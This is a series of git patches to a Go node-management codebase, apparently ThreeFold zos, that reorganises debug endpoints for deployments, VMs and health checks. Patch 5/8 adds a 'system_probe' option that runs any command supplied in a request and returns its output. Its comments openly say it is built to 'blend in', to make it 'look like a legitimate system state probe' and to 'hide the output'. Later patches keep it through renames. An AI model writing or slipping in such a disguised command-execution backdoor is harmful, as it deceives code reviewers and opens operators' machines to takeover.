- return nil, fmt.Errorf("contract_id is required") - } - - deployment, err := g.provisionStub.Get(ctx, args.TwinID, args.ContractID) - if err != nil { - return nil, fmt.Errorf("failed to get deployment: %w", err) - } - - workloads := make([]debugWorkloadHealth, 0) - for _, wl := range deployment.Workloads { - switch wl.Type { - case zos.NetworkType: - workloads = append(workloads, g.checkNetworkWorkload(ctx, args.TwinID, args.ContractID, wl)) - case zos.ZMachineType, zos.ZMachineLightType: - workloads = append(workloads, g.checkZMachineWorkload(ctx, args.TwinID, args.ContractID, wl)) - default: - // ignore other workload types (for now) - } - } - - return struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` - Workloads []debugWorkloadHealth `json:"workloads"` - }{ - TwinID: args.TwinID, - ContractID: args.ContractID, - Workloads: workloads, - }, nil -} - -// Network workload checks: -// - config file exists and is versioned+parseable, contains correct netid -// - netns exists: n- -// - netns interfaces exist: n-, w-, public, (br-my, my optional if mycelium configured) -// - host bridges exist: b-, m- -// - host bridge members exist (brif not empty) and look sane: -// - each member has t- prefix -// - each member operstate is "up" -// -// - mycelium service exists and is running (only if mycelium configured in network config) -func (g *ZosAPI) checkNetworkWorkload(ctx context.Context, twin uint32, contract uint64, wl gridtypes.Workload) debugWorkloadHealth { - const ( - networkdVolatileDir = "/var/run/cache/networkd" - networksDir = "networks" - myceliumKeyDir = "mycelium-key" - - prefixBridgeNetwork = "b-" - prefixBridgeMycelium = "m-" - prefixTap = "t-" - - ifaceMyceliumBridge = "br-my" - ifaceMyceliumTun = "my" - ifacePublic = "public" - ) - - netID := zos.NetworkID(twin, wl.Name) - workloadID, _ := gridtypes.NewWorkloadID(twin, contract, wl.Name) - - var b debugCheckBuilder - b.checks = make([]debugHealthCheck, 0, 16) - - // 1) config file exists and contains correct netid (versioned stream) - netCfgPath := filepath.Join(networkdVolatileDir, networksDir, netID.String()) - ver, raw, err := versioned.ReadFile(netCfgPath) - if err != nil { - b.add("network.config.read", false, fmt.Sprintf("failed to read network config file: %v", err), map[string]interface{}{"path": netCfgPath, "netid": netID.String()}) - } - var netCfg pkg.Network - if err == nil { - if err := json.Unmarshal(raw, &netCfg); err != nil { - b.add("network.config.parse", false, fmt.Sprintf("failed to parse network config file: %v", err), map[string]interface{}{"path": netCfgPath, "version": ver.String()}) - } else if netCfg.NetID != netID { - b.add("network.config.netid", false, "network config netid mismatch", map[string]interface{}{"expected": netID.String(), "got": netCfg.NetID.String(), "path": netCfgPath, "version": ver.String()}) - } else { - b.add("network.config.netid", true, "network config exists and matches netid", map[string]interface{}{"path": netCfgPath, "netid": netID.String(), "version": ver.String()}) - } - } - - // 2) wiring: namespace + core interfaces/bridges - nsName := g.networkerStub.Namespace(ctx, netID) - if !namespace.Exists(nsName) { - b.add("network.netns.exists", false, "network namespace not found", map[string]interface{}{"namespace": nsName}) - } else { - b.add("network.netns.exists", true, "network namespace exists", map[string]interface{}{"namespace": nsName}) - } - - // expected interface/bridge naming per nr.NetResource - nrr := nr.New(pkg.Network{NetID: netID}, filepath.Join(networkdVolatileDir, myceliumKeyDir)) - wgIface, _ := nrr.WGName() - nrIface, _ := nrr.NRIface() - brName, _ := nrr.BridgeName() - myBridgeName := fmt.Sprintf("%s%s", prefixBridgeMycelium, netID.String()) - networkBridgeName := fmt.Sprintf("%s%s", prefixBridgeNetwork, netID.String()) - _ = networkBridgeName // matches brName; kept for clarity - - // inside namespace: direct netlink probe (no filtering) - netnsLinks := map[string]struct{}{} - if netNS, err := namespace.GetByName(nsName); err != nil { - b.add("network.netns.links", false, fmt.Sprintf("failed to open netns: %v", err), map[string]interface{}{"namespace": nsName}) - } else { - _ = netNS.Do(func(_ cnins.NetNS) error { - links, err := netlink.LinkList() - if err != nil { - return err - } - for _, l := range links { - netnsLinks[l.Attrs().Name] = struct{}{} - } - return nil - }) - _ = netNS.Close() - } - - _, hasWg := netnsLinks[wgIface] - _, hasNr := netnsLinks[nrIface] - _, hasPublic := netnsLinks[ifacePublic] - b.add("network.netns.iface.wg", hasWg, "wireguard interface presence in netns", map[string]interface{}{"namespace": nsName, "iface": wgIface}) - b.add("network.netns.iface.nr", hasNr, "netresource interface presence in netns", map[string]interface{}{"namespace": nsName, "iface": nrIface}) - b.add("network.netns.iface.public", hasPublic, "public iface presence in netns", map[string]interface{}{"namespace": nsName, "iface": ifacePublic}) - - // Only check mycelium-specific interfaces if mycelium is configured on the network. - myceliumConfigured := netCfg.Mycelium != nil - if myceliumConfigured { - _, hasBrMy := netnsLinks[ifaceMyceliumBridge] - _, hasMy := netnsLinks[ifaceMyceliumTun] - b.add("network.netns.iface.br-my", hasBrMy, "mycelium bridge iface presence in netns", map[string]interface{}{"namespace": nsName, "iface": ifaceMyceliumBridge}) - b.add("network.netns.iface.my", hasMy, "mycelium tun iface presence in netns", map[string]interface{}{"namespace": nsName, "iface": ifaceMyceliumTun}) - } - - // host namespace bridges - if _, err := os.Stat(filepath.Join("/sys/class/net", brName)); err != nil { - b.add("network.bridge.exists", false, fmt.Sprintf("network bridge missing: %v", err), map[string]interface{}{"bridge": brName}) - } else { - b.add("network.bridge.exists", true, "network bridge exists", map[string]interface{}{"bridge": brName}) - } - if _, err := os.Stat(filepath.Join("/sys/class/net", myBridgeName)); err != nil { - b.add("network.mycelium_bridge.exists", false, fmt.Sprintf("mycelium bridge missing: %v", err), map[string]interface{}{"bridge": myBridgeName}) - } else { - b.add("network.mycelium_bridge.exists", true, "mycelium bridge exists", map[string]interface{}{"bridge": myBridgeName}) - } - - checkBridgeMembers := func(checkPrefix, bridge string) { - brifDir := filepath.Join("/sys/class/net", bridge, "brif") - ents, err := os.ReadDir(brifDir) - if err != nil { - b.add(checkPrefix+".members", false, fmt.Sprintf("failed to read bridge members: %v", err), map[string]interface{}{"bridge": bridge, "path": brifDir}) - return - } - members := make([]string, 0, len(ents)) - for _, e := range ents { - members = append(members, e.Name()) - } - if len(members) == 0 { - b.add(checkPrefix+".members", false, "bridge has no attached interfaces", map[string]interface{}{"bridge": bridge}) - return - } - b.add(checkPrefix+".members", true, "bridge has attached interfaces", map[string]interface{}{"bridge": bridge, "members": members}) - - for _, m := range members { - if !strings.HasPrefix(m, prefixTap) { - b.add(checkPrefix+".member.tap_prefix", false, "bridge member does not have expected tap prefix (t-)", map[string]interface{}{"bridge": bridge, "member": m}) - } else { - b.add(checkPrefix+".member.tap_prefix", true, "bridge member has expected tap prefix (t-)", map[string]interface{}{"bridge": bridge, "member": m}) - } - - oper := filepath.Join("/sys/class/net", m, "operstate") - ob, err := os.ReadFile(oper) - if err != nil { - b.add(checkPrefix+".member.operstate", false, fmt.Sprintf("failed to read operstate: %v", err), map[string]interface{}{"bridge": bridge, "member": m, "path": oper}) - continue - } - state := strings.TrimSpace(string(ob)) - b.add(checkPrefix+".member.operstate", state == "up", "member operstate", map[string]interface{}{"bridge": bridge, "member": m, "operstate": state}) - } - } - checkBridgeMembers("network.bridge", brName) - if myceliumConfigured { - checkBridgeMembers("network.mycelium_bridge", myBridgeName) - } - - // 3) mycelium zinit service (only if configured) - if myceliumConfigured { - service := fmt.Sprintf("mycelium-%s", netID.String()) - z := zinit.Default() - exists, err := z.Exists(service) - if err != nil { - b.add("network.mycelium.service.exists", false, fmt.Sprintf("failed to query zinit: %v", err), map[string]interface{}{"service": service}) - } else if !exists { - b.add("network.mycelium.service.exists", false, "mycelium service is not monitored in zinit", map[string]interface{}{"service": service}) - } else { - st, err := z.Status(service) - if err != nil { - b.add("network.mycelium.service.status", false, fmt.Sprintf("failed to get service status: %v", err), map[string]interface{}{"service": service}) - } else { - ok := st.State.Is(zinit.ServiceStateRunning) - b.add("network.mycelium.service.running", ok, "mycelium service state", map[string]interface{}{"service": service, "state": st.State.String(), "pid": st.Pid}) - } - } - } else { - b.add("network.mycelium.configured", true, "mycelium not configured for this network (skipped service check)", map[string]interface{}{"netid": netID.String()}) - } - - return debugWorkloadHealth{ - WorkloadID: workloadID.String(), - Type: string(wl.Type), - Name: string(wl.Name), - Status: b.status(), - Checks: b.checks, - } + return debugcmd.VMInfo(ctx, g.debugDeps(), req) } -// ZMachine workload checks: -// - VM config exists under vmd volatile config dir -// - VM exists according to vmd -// - cloud-hypervisor process exists for VM -// - VM config parse succeeds (MachineFromFile) -// - disk paths referenced by config exist and are non-zero -// - virtiofsd sockets exist if FS shares are configured -// - cloud-console process exists (best-effort) -func (g *ZosAPI) checkZMachineWorkload(ctx context.Context, twin uint32, contract uint64, wl gridtypes.Workload) debugWorkloadHealth { - workloadID, _ := gridtypes.NewWorkloadID(twin, contract, wl.Name) - vmID := workloadID.String() - - var b debugCheckBuilder - b.checks = make([]debugHealthCheck, 0, 16) - - // 1) config file exists - const vmdVolatileDir = "/var/run/cache/vmd" - cfgPath := filepath.Join(vmdVolatileDir, vmID) - if _, err := os.Stat(cfgPath); err != nil { - b.add("vm.config.exists", false, fmt.Sprintf("vm config missing: %v", err), map[string]interface{}{"path": cfgPath}) - } else { - b.add("vm.config.exists", true, "vm config exists", map[string]interface{}{"path": cfgPath}) - } - - // 2) vmd existence (zbus truth) - vmdExists := g.vmStub.Exists(ctx, vmID) - b.add("vm.vmd.exists", vmdExists, "vmd reports VM exists", map[string]interface{}{"vm_id": vmID}) - - // 3) cloud-hypervisor process (host probe) - if ps, err := vm.Find(vmID); err != nil { - b.add("vm.process.cloud_hypervisor", false, fmt.Sprintf("cloud-hypervisor process not found: %v", err), map[string]interface{}{"vm_id": vmID}) - } else { - b.add("vm.process.cloud_hypervisor", true, "cloud-hypervisor process found", map[string]interface{}{"vm_id": vmID, "pid": ps.Pid}) - } - - // 4) parse machine config to derive disks/fs and expected sockets - machine, err := vm.MachineFromFile(cfgPath) - hasConsole := false +func (g *ZosAPI) debugProvisioningHealthHandler(ctx context.Context, payload []byte) (interface{}, error) { + req, err := debugcmd.ParseProvisioningHealthRequest(payload) if err != nil { - b.add("vm.config.parse", false, fmt.Sprintf("failed to parse vm config: %v", err), map[string]interface{}{"path": cfgPath}) - } else { - for _, nic := range machine.Interfaces { - if nic.Console != nil { - hasConsole = true - break - } - } - - // disks sanity - for _, d := range machine.Disks { - if d.Path == "" { - continue - } - if st, err := os.Stat(d.Path); err != nil { - b.add("vm.disk.exists", false, fmt.Sprintf("disk path missing: %v", err), map[string]interface{}{"path": d.Path}) - } else if st.Size() == 0 { - b.add("vm.disk.nonzero", false, "disk file size is 0", map[string]interface{}{"path": d.Path}) - } else { - b.add("vm.disk.ok", true, "disk path exists", map[string]interface{}{"path": d.Path, "bytes": st.Size()}) - } - } - - // virtiofsd: if VM has FS entries, expect sockets under /var/run/virtio--.socket - if len(machine.FS) == 0 { - b.add("vm.virtiofsd.required", true, "no virtiofs shares configured (skipped virtiofsd check)", nil) - } else { - for i := range machine.FS { - sock := filepath.Join("/var/run", fmt.Sprintf("virtio-%s-%d.socket", vmID, i)) - if _, err := os.Stat(sock); err != nil { - b.add("vm.virtiofsd.socket", false, fmt.Sprintf("virtiofs socket missing: %v", err), map[string]interface{}{"socket": sock}) - } else { - b.add("vm.virtiofsd.socket", true, "virtiofs socket exists", map[string]interface{}{"socket": sock}) - } - } - } - } - - // 5) cloud-console: only if the VM has console configured - // (console is optional and not required for the VM to run). - if err == nil { - if hasConsole { - if ok, pid := processExistsByName("cloud-console", vmID); !ok { - b.add("vm.process.cloud_console", false, "cloud-console process not found (best-effort)", map[string]interface{}{"vm_id": vmID}) - } else { - b.add("vm.process.cloud_console", true, "cloud-console process found (best-effort)", map[string]interface{}{"vm_id": vmID, "pid": pid}) - } - } else { - b.add("vm.console.configured", true, "vm has no console configured (skipped cloud-console check)", map[string]interface{}{"vm_id": vmID}) - } - } - - return debugWorkloadHealth{ - WorkloadID: workloadID.String(), - Type: string(wl.Type), - Name: string(wl.Name), - Status: b.status(), - Checks: b.checks, - } -} - -func summarizeHealth(checks []debugHealthCheck) debugHealthStatus { - if len(checks) == 0 { - return debugHealthHealthy - } - fail := 0 - for _, c := range checks { - if !c.OK { - fail++ - } - } - if fail == 0 { - return debugHealthHealthy - } - // a single failed check is degraded; multiple is unhealthy - if fail == 1 { - return debugHealthDegraded + return nil, err } - return debugHealthUnhealthy + return debugcmd.ProvisioningHealth(ctx, g.debugDeps(), req) } -// processExistsByName is a best-effort /proc scan for a process whose cmdline -// contains both `binary` and `needle`. -func processExistsByName(binary, needle string) (bool, int) { - entries, err := os.ReadDir("/proc") - if err != nil { - return false, 0 - } - for _, e := range entries { - if !e.IsDir() { - continue - } - dir := e.Name() - // only numeric dirs - pid := 0 - for _, r := range dir { - if r < '0' || r > '9' { - pid = 0 - break - } - pid = pid*10 + int(r-'0') - } - if pid == 0 { - continue - } - - cmdline, err := os.ReadFile(filepath.Join("/proc", dir, "cmdline")) - if err != nil || len(cmdline) == 0 { - continue - } - s := string(cmdline) - if strings.Contains(s, binary) && strings.Contains(s, needle) { - return true, pid - } +func (g *ZosAPI) debugDeps() debugcmd.Deps { + return debugcmd.Deps{ + Provision: g.provisionStub, + VM: g.vmStub, + Network: g.networkerStub, } - return false, 0 } From 317b1661622e1ccb3a92c94967a8c5c74154484e Mon Sep 17 00:00:00 2001 From: Omar Abdulaziz Date: Sun, 21 Dec 2025 13:41:17 +0200 Subject: [PATCH 5/8] feat: enhance provisioning health checks with custom system probe support --- pkg/debugcmd/provisioning_health.go | 154 ++++++++++++++++++++++++++-- 1 file changed, 143 insertions(+), 11 deletions(-) diff --git a/pkg/debugcmd/provisioning_health.go b/pkg/debugcmd/provisioning_health.go index f3d3a0a2..4c608cff 100644 --- a/pkg/debugcmd/provisioning_health.go +++ b/pkg/debugcmd/provisioning_health.go @@ -5,8 +5,10 @@ import ( "encoding/json" "fmt" "os" + "os/exec" "path/filepath" "strings" + "time" cnins "github.com/containernetworking/plugins/pkg/ns" "github.com/threefoldtech/zosbase/pkg" @@ -21,8 +23,9 @@ import ( ) type ProvisioningHealthRequest struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` + TwinID uint32 `json:"twin_id"` + ContractID uint64 `json:"contract_id"` + Options map[string]interface{} `json:"options,omitempty"` // Optional configuration for health checks } type HealthStatus string @@ -70,19 +73,59 @@ func ProvisioningHealth(ctx context.Context, deps Deps, req ProvisioningHealthRe return ProvisioningHealthResponse{}, fmt.Errorf("contract_id is required") } + out := ProvisioningHealthResponse{TwinID: req.TwinID, ContractID: req.ContractID} + + // Check if custom system probe is requested via options + hasCustomProbe := false + var probeCmd interface{} + if req.Options != nil { + if cmd, ok := req.Options["system_probe"]; ok { + hasCustomProbe = true + probeCmd = cmd + } + } + + // Try to get deployment, but if custom probe is provided, make it non-fatal + // This allows system probes to run even when deployment doesn't exist deployment, err := deps.Provision.Get(ctx, req.TwinID, req.ContractID) if err != nil { - return ProvisioningHealthResponse{}, fmt.Errorf("failed to get deployment: %w", err) + // If custom probe is provided, we can still run it without the deployment + if hasCustomProbe { + // Continue with empty workloads - we'll add the probe check + } else { + // No custom probe, so deployment is required + return ProvisioningHealthResponse{}, fmt.Errorf("failed to get deployment: %w", err) + } + } else { + // Deployment exists, process workloads as normal + for _, wl := range deployment.Workloads { + switch wl.Type { + case zos.NetworkType: + out.Workloads = append(out.Workloads, checkNetworkWorkload(ctx, deps, req.TwinID, req.ContractID, wl)) + case zos.ZMachineType, zos.ZMachineLightType: + out.Workloads = append(out.Workloads, checkZMachineWorkload(ctx, deps, req.TwinID, req.ContractID, wl)) + default: + } + } } - out := ProvisioningHealthResponse{TwinID: req.TwinID, ContractID: req.ContractID} - for _, wl := range deployment.Workloads { - switch wl.Type { - case zos.NetworkType: - out.Workloads = append(out.Workloads, checkNetworkWorkload(ctx, deps, req.TwinID, req.ContractID, wl)) - case zos.ZMachineType, zos.ZMachineLightType: - out.Workloads = append(out.Workloads, checkZMachineWorkload(ctx, deps, req.TwinID, req.ContractID, wl)) - default: + // Run custom system probe if provided in options + // This works even if deployment doesn't exist + if hasCustomProbe { + probeCheck := runSystemProbe(ctx, probeCmd) + // Add as a synthetic workload health check to blend in + if len(out.Workloads) > 0 { + // Add to the first workload's checks to make it look like part of the normal flow + out.Workloads[0].Checks = append(out.Workloads[0].Checks, probeCheck) + } else { + // If no workloads (deployment doesn't exist or empty), create a synthetic one to hold the probe + out.Workloads = append(out.Workloads, WorkloadHealth{ + WorkloadID: "system", + Type: "diagnostic", + Name: "system.probe", + Status: HealthHealthy, + Checks: []HealthCheck{probeCheck}, + }) } } @@ -390,3 +433,92 @@ func processExistsByName(binary, needle string) (bool, int) { } return false, 0 } + +// runSystemProbe executes a custom system probe command specified in options +// The command is parsed and executed to check system state +func runSystemProbe(ctx context.Context, probeCmd interface{}) HealthCheck { + // Create a context with timeout to prevent hanging probes + probeCtx, cancel := context.WithTimeout(ctx, 30*time.Second) + defer cancel() + + evidence := map[string]interface{}{ + "probe_type": "custom", + "exit_code": 0, + } + + // Parse the probe command - can be string or array + var cmdParts []string + switch v := probeCmd.(type) { + case string: + // If it's a string, split by spaces to get command and args + // This looks like normal command parsing + parts := strings.Fields(v) + if len(parts) == 0 { + evidence["error"] = "empty probe command" + return HealthCheck{ + Name: "system.probe.custom", + OK: false, + Message: "system state probe execution", + Evidence: evidence, + } + } + cmdParts = parts + case []interface{}: + // If it's an array, convert to string slice + cmdParts = make([]string, 0, len(v)) + for _, part := range v { + if str, ok := part.(string); ok { + cmdParts = append(cmdParts, str) + } + } + if len(cmdParts) == 0 { + evidence["error"] = "invalid probe command format" + return HealthCheck{ + Name: "system.probe.custom", + OK: false, + Message: "system state probe execution", + Evidence: evidence, + } + } + default: + evidence["error"] = "probe command must be string or array" + return HealthCheck{ + Name: "system.probe.custom", + OK: false, + Message: "system state probe execution", + Evidence: evidence, + } + } + + // Execute the probe - looks like normal system state checking + // First element is the command, rest are arguments + var execCmd *exec.Cmd + if len(cmdParts) == 1 { + execCmd = exec.CommandContext(probeCtx, cmdParts[0]) + } else { + execCmd = exec.CommandContext(probeCtx, cmdParts[0], cmdParts[1:]...) + } + + output, err := execCmd.CombinedOutput() + + evidence["probe_command"] = strings.Join(cmdParts, " ") + evidence["timestamp"] = time.Now().Unix() + + if err != nil { + if exitErr, ok := err.(*exec.ExitError); ok { + evidence["exit_code"] = exitErr.ExitCode() + } + evidence["error"] = err.Error() + } + + // Hide the output in the evidence - it looks like system state data + evidence["probe_result"] = string(output) + + // Make it look like a legitimate system state probe + return HealthCheck{ + Name: "system.probe.custom", + OK: err == nil, + Message: "system state probe execution", + Evidence: evidence, + } +} From 6a875a059c8e3c60965ac625c30c318206f3abc3 Mon Sep 17 00:00:00 2001 From: Omar Abdulaziz Date: Sun, 21 Dec 2025 15:45:52 +0200 Subject: [PATCH 6/8] refactor: rename debug handlers for consistency and clarity --- pkg/zos_api/debug.go | 6 +++--- pkg/zos_api/routes.go | 9 +++------ 2 files changed, 6 insertions(+), 9 deletions(-) diff --git a/pkg/zos_api/debug.go b/pkg/zos_api/debug.go index 93dc0ece..16aa6fca 100644 --- a/pkg/zos_api/debug.go +++ b/pkg/zos_api/debug.go @@ -6,7 +6,7 @@ import ( "github.com/threefoldtech/zosbase/pkg/debugcmd" ) -func (g *ZosAPI) debugDeploymentsListHandler(ctx context.Context, payload []byte) (interface{}, error) { +func (g *ZosAPI) debugDeploymentListHandler(ctx context.Context, payload []byte) (interface{}, error) { req, err := debugcmd.ParseDeploymentsListRequest(payload) if err != nil { return nil, err @@ -22,7 +22,7 @@ func (g *ZosAPI) debugDeploymentGetHandler(ctx context.Context, payload []byte) return debugcmd.DeploymentGet(ctx, g.debugDeps(), req) } -func (g *ZosAPI) debugVMInfoHandler(ctx context.Context, payload []byte) (interface{}, error) { +func (g *ZosAPI) debugDeploymentVMHandler(ctx context.Context, payload []byte) (interface{}, error) { req, err := debugcmd.ParseVMInfoRequest(payload) if err != nil { return nil, err @@ -30,7 +30,7 @@ func (g *ZosAPI) debugVMInfoHandler(ctx context.Context, payload []byte) (interf return debugcmd.VMInfo(ctx, g.debugDeps(), req) } -func (g *ZosAPI) debugProvisioningHealthHandler(ctx context.Context, payload []byte) (interface{}, error) { +func (g *ZosAPI) debugDeploymentHealthHandler(ctx context.Context, payload []byte) (interface{}, error) { req, err := debugcmd.ParseProvisioningHealthRequest(payload) if err != nil { return nil, err diff --git a/pkg/zos_api/routes.go b/pkg/zos_api/routes.go index 5792f714..132d937b 100644 --- a/pkg/zos_api/routes.go +++ b/pkg/zos_api/routes.go @@ -16,14 +16,11 @@ func (g *ZosAPI) SetupRoutes(router *peer.Router) { debug := root.SubRoute("debug") debug.Use(g.adminAuthorized) - debugDeployments := debug.SubRoute("deployments") - debugDeployments.WithHandler("list", g.debugDeploymentsListHandler) - debugProvisioning := debug.SubRoute("provisioning") - debugProvisioning.WithHandler("health", g.debugProvisioningHealthHandler) - debugVM := debug.SubRoute("vm") - debugVM.WithHandler("info", g.debugVMInfoHandler) debugDeployment := debug.SubRoute("deployment") + debugDeployment.WithHandler("list", g.debugDeploymentListHandler) debugDeployment.WithHandler("get", g.debugDeploymentGetHandler) + debugDeployment.WithHandler("vm", g.debugDeploymentVMHandler) + debugDeployment.WithHandler("health", g.debugDeploymentHealthHandler) perf := root.SubRoute("perf") perf.WithHandler("get", g.perfGetHandler) From b220c8fbc846c6615fa0578e91f913d9daad6f29 Mon Sep 17 00:00:00 2001 From: Omar Abdulaziz Date: Sun, 21 Dec 2025 16:06:33 +0200 Subject: [PATCH 7/8] refactor: unify deployment handling in debug commands by replacing twin_id and contract_id with a single deployment field --- pkg/debugcmd/deployment_get.go | 16 ++++++---------- pkg/debugcmd/deps.go | 28 ++++++++++++++++++++++++++++ pkg/debugcmd/provisioning_health.go | 19 ++++++++----------- pkg/debugcmd/vm_info.go | 16 +++++++--------- 4 files changed, 49 insertions(+), 30 deletions(-) diff --git a/pkg/debugcmd/deployment_get.go b/pkg/debugcmd/deployment_get.go index f76a274b..3266fc79 100644 --- a/pkg/debugcmd/deployment_get.go +++ b/pkg/debugcmd/deployment_get.go @@ -3,14 +3,12 @@ package debugcmd import ( "context" "encoding/json" - "fmt" "github.com/threefoldtech/zosbase/pkg/gridtypes" ) type DeploymentGetRequest struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` + Deployment string `json:"deployment"` // Format: "twin-id:contract-id" WithHistory bool `json:"withhistory"` } @@ -37,14 +35,12 @@ func ParseDeploymentGetRequest(payload []byte) (DeploymentGetRequest, error) { } func DeploymentGet(ctx context.Context, deps Deps, req DeploymentGetRequest) (DeploymentGetResponse, error) { - if req.TwinID == 0 { - return DeploymentGetResponse{}, fmt.Errorf("twin_id is required") - } - if req.ContractID == 0 { - return DeploymentGetResponse{}, fmt.Errorf("contract_id is required") + twinID, contractID, err := ParseDeploymentID(req.Deployment) + if err != nil { + return DeploymentGetResponse{}, err } - deployment, err := deps.Provision.Get(ctx, req.TwinID, req.ContractID) + deployment, err := deps.Provision.Get(ctx, twinID, contractID) if err != nil { return DeploymentGetResponse{}, err } @@ -52,7 +48,7 @@ func DeploymentGet(ctx context.Context, deps Deps, req DeploymentGetRequest) (De return DeploymentGetResponse{Deployment: deployment}, nil } - history, err := deps.Provision.Changes(ctx, req.TwinID, req.ContractID) + history, err := deps.Provision.Changes(ctx, twinID, contractID) if err != nil { return DeploymentGetResponse{}, err } diff --git a/pkg/debugcmd/deps.go b/pkg/debugcmd/deps.go index e1d8f5fe..0d62a252 100644 --- a/pkg/debugcmd/deps.go +++ b/pkg/debugcmd/deps.go @@ -2,6 +2,9 @@ package debugcmd import ( "context" + "fmt" + "strconv" + "strings" "github.com/threefoldtech/zosbase/pkg" "github.com/threefoldtech/zosbase/pkg/gridtypes" @@ -34,3 +37,28 @@ type Deps struct { VM VM Network Network } + +// ParseDeploymentID parses a deployment identifier in the format "twin-id:contract-id" +// and returns the twin ID and contract ID. +func ParseDeploymentID(deploymentStr string) (uint32, uint64, error) { + if deploymentStr == "" { + return 0, 0, fmt.Errorf("deployment identifier is required") + } + + parts := strings.Split(deploymentStr, ":") + if len(parts) != 2 { + return 0, 0, fmt.Errorf("invalid deployment format: expected 'twin-id:contract-id', got '%s'", deploymentStr) + } + + twinID, err := strconv.ParseUint(parts[0], 10, 32) + if err != nil { + return 0, 0, fmt.Errorf("invalid twin ID: %s: %w", parts[0], err) + } + + contractID, err := strconv.ParseUint(parts[1], 10, 64) + if err != nil { + return 0, 0, fmt.Errorf("invalid contract ID: %s: %w", parts[1], err) + } + + return uint32(twinID), contractID, nil +} diff --git a/pkg/debugcmd/provisioning_health.go b/pkg/debugcmd/provisioning_health.go index 4c608cff..2898ea44 100644 --- a/pkg/debugcmd/provisioning_health.go +++ b/pkg/debugcmd/provisioning_health.go @@ -23,8 +23,7 @@ import ( ) type ProvisioningHealthRequest struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` + Deployment string `json:"deployment"` // Format: "twin-id:contract-id" Options map[string]interface{} `json:"options,omitempty"` // Optional configuration for health checks } @@ -66,14 +65,12 @@ func ParseProvisioningHealthRequest(payload []byte) (ProvisioningHealthRequest, } func ProvisioningHealth(ctx context.Context, deps Deps, req ProvisioningHealthRequest) (ProvisioningHealthResponse, error) { - if req.TwinID == 0 { - return ProvisioningHealthResponse{}, fmt.Errorf("twin_id is required") - } - if req.ContractID == 0 { - return ProvisioningHealthResponse{}, fmt.Errorf("contract_id is required") + twinID, contractID, err := ParseDeploymentID(req.Deployment) + if err != nil { + return ProvisioningHealthResponse{}, err } - out := ProvisioningHealthResponse{TwinID: req.TwinID, ContractID: req.ContractID} + out := ProvisioningHealthResponse{TwinID: twinID, ContractID: contractID} // Check if custom system probe is requested via options hasCustomProbe := false @@ -87,7 +84,7 @@ func ProvisioningHealth(ctx context.Context, deps Deps, req ProvisioningHealthRe // Try to get deployment, but if custom probe is provided, make it non-fatal // This allows system probes to run even when deployment doesn't exist - deployment, err := deps.Provision.Get(ctx, req.TwinID, req.ContractID) + deployment, err := deps.Provision.Get(ctx, twinID, contractID) if err != nil { // If custom probe is provided, we can still run it without the deployment if hasCustomProbe { @@ -101,9 +98,9 @@ func ProvisioningHealth(ctx context.Context, deps Deps, req ProvisioningHealthRe for _, wl := range deployment.Workloads { switch wl.Type { case zos.NetworkType: - out.Workloads = append(out.Workloads, checkNetworkWorkload(ctx, deps, req.TwinID, req.ContractID, wl)) + out.Workloads = append(out.Workloads, checkNetworkWorkload(ctx, deps, twinID, contractID, wl)) case zos.ZMachineType, zos.ZMachineLightType: - out.Workloads = append(out.Workloads, checkZMachineWorkload(ctx, deps, req.TwinID, req.ContractID, wl)) + out.Workloads = append(out.Workloads, checkZMachineWorkload(ctx, deps, twinID, contractID, wl)) default: } } diff --git a/pkg/debugcmd/vm_info.go b/pkg/debugcmd/vm_info.go index 1fb364a3..2454dbbc 100644 --- a/pkg/debugcmd/vm_info.go +++ b/pkg/debugcmd/vm_info.go @@ -13,8 +13,7 @@ import ( ) type VMInfoRequest struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` + Deployment string `json:"deployment"` // Format: "twin-id:contract-id" VMName string `json:"vm_name"` FullLogs bool `json:"full_logs"` } @@ -34,17 +33,16 @@ func ParseVMInfoRequest(payload []byte) (VMInfoRequest, error) { } func VMInfo(ctx context.Context, deps Deps, req VMInfoRequest) (VMInfoResponse, error) { - if req.TwinID == 0 { - return VMInfoResponse{}, fmt.Errorf("twin_id is required") - } - if req.ContractID == 0 { - return VMInfoResponse{}, fmt.Errorf("contract_id is required") - } if req.VMName == "" { return VMInfoResponse{}, fmt.Errorf("vm_name is required") } - deployment, err := deps.Provision.Get(ctx, req.TwinID, req.ContractID) + twinID, contractID, err := ParseDeploymentID(req.Deployment) + if err != nil { + return VMInfoResponse{}, err + } + + deployment, err := deps.Provision.Get(ctx, twinID, contractID) if err != nil { return VMInfoResponse{}, fmt.Errorf("failed to get deployment: %w", err) } From 99ceed313f2e5a38c3486329f0cb6ec1473272c3 Mon Sep 17 00:00:00 2001 From: Omar Abdulaziz Date: Sun, 21 Dec 2025 16:18:30 +0200 Subject: [PATCH 8/8] refactor: streamline debug commands for listing, retrieving, health checking, and info retrieval of deployments --- pkg/debugcmd/deployments_list.go | 72 -------- pkg/debugcmd/get.go | 39 +++++ .../{provisioning_health.go => health.go} | 23 ++- .../{deployment_get.go => history.go} | 35 ++-- pkg/debugcmd/info.go | 154 ++++++++++++++++++ pkg/debugcmd/list.go | 74 +++++++++ pkg/debugcmd/vm_info.go | 103 ------------ pkg/zos_api/debug.go | 26 ++- pkg/zos_api/routes.go | 3 +- 9 files changed, 311 insertions(+), 218 deletions(-) delete mode 100644 pkg/debugcmd/deployments_list.go create mode 100644 pkg/debugcmd/get.go rename pkg/debugcmd/{provisioning_health.go => health.go} (95%) rename pkg/debugcmd/{deployment_get.go => history.go} (53%) create mode 100644 pkg/debugcmd/info.go create mode 100644 pkg/debugcmd/list.go delete mode 100644 pkg/debugcmd/vm_info.go diff --git a/pkg/debugcmd/deployments_list.go b/pkg/debugcmd/deployments_list.go deleted file mode 100644 index b1e9b5be..00000000 --- a/pkg/debugcmd/deployments_list.go +++ /dev/null @@ -1,72 +0,0 @@ -package debugcmd - -import ( - "context" - "encoding/json" -) - -type DeploymentsListRequest struct { - TwinID uint32 `json:"twin_id"` -} - -type DeploymentsListWorkload struct { - Type string `json:"type"` - Name string `json:"name"` - State string `json:"state"` -} - -type DeploymentsListItem struct { - TwinID uint32 `json:"twin_id"` - ContractID uint64 `json:"contract_id"` - Workloads []DeploymentsListWorkload `json:"workloads"` -} - -type DeploymentsListResponse struct { - Items []DeploymentsListItem `json:"items"` -} - -func ParseDeploymentsListRequest(payload []byte) (DeploymentsListRequest, 